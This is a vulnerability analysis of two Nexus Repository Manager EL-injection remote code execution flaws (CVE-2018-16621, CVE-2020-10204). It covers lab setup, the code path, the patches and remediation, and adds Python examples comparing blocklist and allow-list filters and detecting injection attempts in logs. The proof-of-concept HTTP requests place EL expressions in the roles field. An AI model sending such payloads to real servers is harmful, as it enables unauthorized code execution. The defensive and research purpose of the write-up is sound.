A Brief Analysis of the Nexus Repository UserComponent Remote Code Execution Vulnerabilities (CVE-2018-16621 & CVE-2020-10204)
Word count: 1269  2025-08-20 18:17:53
Vulnerability overview
Nexus Repository OSS is a general-purpose artifact repository manager. Sonatype Nexus Repository Manager 3 contains a remote code execution vulnerability reachable through the /service/extdirect endpoint; exploiting it requires an administrator account. When a UserComponent object is validated through its annotations, the constraint violation message is rendered by the EL engine, so a crafted JSON request leads to EL expression injection and, from there, to remote code execution.
Affected versions
CVE-2018-16621
- Affected versions: Nexus Repository Manager OSS/Pro 3.x - 3.13
- Fixed version: Nexus Repository Manager OSS/Pro 3.14
- CVSS score: 7.1 (High)
CVE-2020-10204
- Affected versions: Nexus Repository Manager OSS/Pro 3.x - 3.21.1
- Fixed version: Nexus Repository Manager OSS/Pro 3.21.2
- CVSS score: 9.1 (Critical)
Environment setup
CVE-2018-16621 environment
- Download the Nexus source:
git clone https://github.com/sonatype/nexus-public.git
cd nexus-public
git checkout -f -b release-3.13.0-01 remotes/origin/release-3.13.0-01
- Pull the Docker image:
docker pull sonatype/nexus3:3.13.0
- Run the container (with remote debugging enabled on port 5050):
docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /path/to/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3:3.13.0
CVE-2020-10204 environment
- Switch branch:
cd nexus-public
git checkout -f -b release-3.14.0-04 remotes/origin/release-3.14.0-04
- Pull the Docker image:
docker pull sonatype/nexus3:3.14.0
- Run the container (same command as above)
Vulnerability reproduction
CVE-2018-16621 PoC
POST /service/extdirect HTTP/1.1
Host: target.com:8081
Content-Type: application/json
Cookie: NXSESSIONID=your_session_id

{
"action": "coreui_User",
"method": "update",
"data": [{
"userId": "admin",
"version": "2",
"firstName": "admin",
"lastName": "User",
"email": "admin@example.org",
"status": "active",
"roles": ["exp|${222*6}|"]
}],
"type": "rpc",
"tid": 11
}
CVE-2020-10204 PoC
POST /service/extdirect HTTP/1.1
Host: target.com:8081
Content-Type: application/json
Cookie: NXSESSIONID=your_session_id; NX-ANTI-CSRF-TOKEN=your_token

{
"action": "coreui_User",
"method": "create",
"data": [{
"userId": "admin",
"version": "2",
"firstName": "admin",
"lastName": "User",
"email": "admin@example.org",
"status": "active",
"roles": ["exp|$\\A{2*333}|"]
}],
"type": "rpc",
"tid": 11
}
Vulnerability analysis
Trigger flow
- The request enters HttpServlet#service
- DirectJNgineServlet#doPost handles the POST request, and JsonRequestProcessor#processIndividualRequest parses the JSON payload
- UserComponent#update or UserComponent#create is invoked via reflection
- The @Validate annotation triggers validation, and RolesExistValidator#isValid processes the roles parameter
- The malicious expression is passed into buildConstraintViolationWithTemplate
- The EL expression is parsed and executed
Key code analysis
UserComponent handling
@Named
@Singleton
@Consumes({APPLICATION_JSON})
@Produces({APPLICATION_JSON})
@Path(UserComponent.RESOURCE_URI)
public class UserComponent
{
  @PUT
  @Path("update")
  @Validate   // runs Bean Validation on the deserialized UserXO, including its roles
  public UserXO update(final UserXO user) {
    // ... (method body elided on the page)
  }
}
RolesExistValidator validation
public class RolesExistValidator extends ConstraintValidatorSupport<RolesExist, Collection<?>> {
  @Override
  public boolean isValid(final Collection<?> value, final ConstraintValidatorContext context) {
    // ... (elided on the page: computes `missing`, the requested role ids that do not exist)
    // The caller-controlled role ids are concatenated into the violation message template,
    // which the message interpolator then evaluates as EL.
    context.buildConstraintViolationWithTemplate("Missing roles: " + missing)
        .addConstraintViolation();
    return false;
  }
}
EL expression evaluation
The call chain finally reaches:
com.sun.el.ValueExpressionImpl#getValue
Patch analysis
CVE-2018-16621 patch
An EL expression filter was added to RolesExistValidator:
org.sonatype.nexus.common.template.EscapeHelper#stripJavaEl
The filter replaces "${" with "{".
CVE-2020-10204 patch
The filtering logic was improved to handle more variants:
org.sonatype.nexus.common.template.EscapeHelper.java
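To make the patch discussion concrete, here is an added Python example (not Nexus code and not from the original post). It models the first patch as the page describes it, a literal replacement of "${" with "{", and runs the two role values from the PoCs above through it, alongside a looser pattern check and an allow-list check on the role id. The function names, the regular expressions and the benign role id "nx-admin" are this example's assumptions.

```python
import re

# Role values from the two PoCs on this page, plus one constructed benign id.
# The JSON string "$\\A{...}" in the second PoC decodes to $\A{...}.
ROLE_VALUES = {
    "cve-2018-16621": "exp|${222*6}|",
    "cve-2020-10204": "exp|$\\A{2*333}|",
    "benign": "nx-admin",
}


def strip_dollar_brace(value: str) -> str:
    """Model of the 3.14 filter as the page describes it: "${" becomes "{".

    This is the example's reading of the page, not the EscapeHelper source.
    """
    return value.replace("${", "{")


# Blocklist-style pattern check: a "$" or "#" that reaches a "{" within a few
# characters. Loose on purpose so that it also matches the $\A{ variant.
EL_LIKE = re.compile(r"[$#][^{]{0,3}\{")


def looks_like_el(value: str) -> bool:
    return EL_LIKE.search(value) is not None


# Allow-list check (assumed character set for role ids; adjust to the naming
# scheme in use). Anything outside the set is rejected before it can be
# concatenated into a violation message, so no EL syntax reaches the template.
ROLE_ID = re.compile(r"[A-Za-z0-9._-]{1,255}")


def is_valid_role_id(value: str) -> bool:
    return ROLE_ID.fullmatch(value) is not None


def evaluate(value: str) -> dict:
    """Compare the three approaches on one role value."""
    stripped = strip_dollar_brace(value)
    return {
        "strip_changed_it": stripped != value,
        "el_like_after_strip": looks_like_el(stripped),
        "allowlist_accepts": is_valid_role_id(value),
    }


def report() -> dict:
    return {name: evaluate(v) for name, v in ROLE_VALUES.items()}


if __name__ == "__main__":
    for name, result in report().items():
        print(name, result)
```

Running it shows the difference between the two defensive styles: the literal replacement neutralizes the first PoC value but leaves the second one untouched, so a blocklist has to anticipate every spelling of the expression delimiter, whereas the allow-list rejects both values without knowing anything about EL syntax. For Nexus itself the fix is the upgrade listed below; the allow-list pattern is for anyone writing a similar validator that echoes user input into a message template.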
Remediation
- Upgrade to the latest version:
  - CVE-2018-16621: upgrade to 3.14 or later
  - CVE-2020-10204: upgrade to 3.21.2 or later
- Restrict access to administrator accounts
- Monitor the /service/extdirect endpoint for anomalous requests
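The monitoring recommendation can be turned into a concrete check. The following is an added Python example, not part of the original post and not Nexus code: it scans request-log records for /service/extdirect calls whose data contains EL-like strings and aggregates the hits per source address. The JSON Lines log format, its field names, the addresses and the status values are all constructed for this example; the two suspicious bodies mirror the PoCs above.

```python
import json
import re

# Constructed request-log records (JSON Lines) for this example; not real
# Nexus logs. Raw string, so "$\\A{" reaches json.loads as written here.
SAMPLE_LOG = r'''
{"ts":"2025-08-20T10:00:01Z","src":"10.0.0.5","path":"/service/extdirect","status":200,"body":{"action":"coreui_User","method":"update","data":[{"userId":"admin","roles":["nx-admin"]}]}}
{"ts":"2025-08-20T10:00:02Z","src":"10.0.0.9","path":"/service/extdirect","status":200,"body":{"action":"coreui_User","method":"update","data":[{"userId":"admin","roles":["exp|${222*6}|"]}]}}
{"ts":"2025-08-20T10:00:03Z","src":"10.0.0.9","path":"/service/extdirect","status":500,"body":{"action":"coreui_User","method":"create","data":[{"userId":"admin","roles":["exp|$\\A{2*333}|"]}]}}
{"ts":"2025-08-20T10:00:04Z","src":"10.0.0.7","path":"/service/rest/v1/status","status":200,"body":null}
'''

# A "$" or "#" that reaches a "{" within a few characters; loose on purpose so
# that both the ${...} and the $\A{...} spellings from the PoCs are caught.
EL_LIKE = re.compile(r"[$#][^{]{0,3}\{")

# The Ext Direct calls used by this page's PoCs. Every call on the endpoint is
# scanned; these are additionally marked as the known-sensitive path.
WATCHED_CALLS = {("coreui_User", "update"), ("coreui_User", "create")}


def walk_strings(node):
    """Yield every string value nested anywhere in a decoded JSON structure."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for child in node.values():
            yield from walk_strings(child)
    elif isinstance(node, list):
        for child in node:
            yield from walk_strings(child)


def detect(log_text: str) -> list:
    """Return one alert per /service/extdirect request carrying EL-like strings."""
    alerts = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        body = rec.get("body")
        if rec.get("path") != "/service/extdirect" or not isinstance(body, dict):
            continue
        hits = [s for s in walk_strings(body.get("data", [])) if EL_LIKE.search(s)]
        if not hits:
            continue
        call = (body.get("action"), body.get("method"))
        alerts.append({
            "ts": rec["ts"],
            "src": rec["src"],
            "call": call,
            "known_sensitive": call in WATCHED_CALLS,
            "status": rec["status"],   # recorded for triage, deliberately not filtered on
            "values": hits,
        })
    return alerts


def sources_by_alert_count(alerts: list) -> dict:
    """Aggregate alerts per source address for triage."""
    counts = {}
    for alert in alerts:
        counts[alert["src"]] = counts.get(alert["src"], 0) + 1
    return counts


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print(sources_by_alert_count(found))
```

Two design choices follow from the analysis above. The EL runs inside the constraint violation message, that is, on the path where validation of the roles fails, so the offending request does not necessarily come back with a success status and the detector must not discard non-2xx records. And the check walks every string in the request data rather than only the roles field, so a variant that moves the expression into another validated attribute would still be flagged. If the request log in use does not retain bodies, the same logic has to run at a reverse proxy or WAF that does.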